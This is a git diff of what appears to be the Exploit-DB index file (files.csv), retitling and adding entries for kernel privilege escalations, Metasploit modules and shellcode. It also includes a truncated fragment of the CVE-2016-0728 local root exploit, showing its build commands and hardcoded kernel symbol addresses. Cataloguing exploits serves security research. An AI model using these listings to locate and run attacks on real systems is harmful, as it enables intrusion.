diff --git a/files.csv b/files.csv index f1908ee12..80646c465 100755 --- a/files.csv +++ b/files.csv @@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 -778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 +778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80 @@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 -895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 +895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 @@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port 5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0 -5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 +5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0 @@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 -8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 +8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0 @@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0 -9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 +9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0 @@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 -9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0 +9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0 @@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 -9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0 +9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 @@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 -9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0 +9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 @@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0 -9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 +9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 @@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 @@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 -17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 +17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 @@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0 -19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 -19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0 +19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 +19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0 @@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 -33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 +33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 @@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 -39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0 +39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 +40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 -39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 -39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 +39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 +39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0 -39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21 +39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 @@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 -39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0 +39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0 @@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port 39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0 39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0 -39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460 +39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80 @@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80 -39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443 +39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 @@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 -39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0 +39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80 39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 -39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604 +39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 @@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80 +39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21 +40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80 +40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0 diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c index bcee599b4..1e3e01f7a 100755 --- a/platforms/linux/local/39277.c +++ b/platforms/linux/local/39277.c @@ -5,12 +5,10 @@ # CVE : CVE-2016-0728 */ -/* CVE-2016-0728 local root exploit - modified by Federico Bento to read kernel symbols from /proc/kallsyms - props to grsecurity/PaX for preventing this in so many ways +/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ +/* $ ./cve_2016_072 PP_KEY */ - $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall - $ ./cve_2016_072 PP_KEY */ +/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */ #include #include @@ -30,183 +28,143 @@ _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; #define STRUCT_LEN (0xb8 - 0x30) -#define COMMIT_CREDS_ADDR (0xffffffff810bb050) -#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) +#define 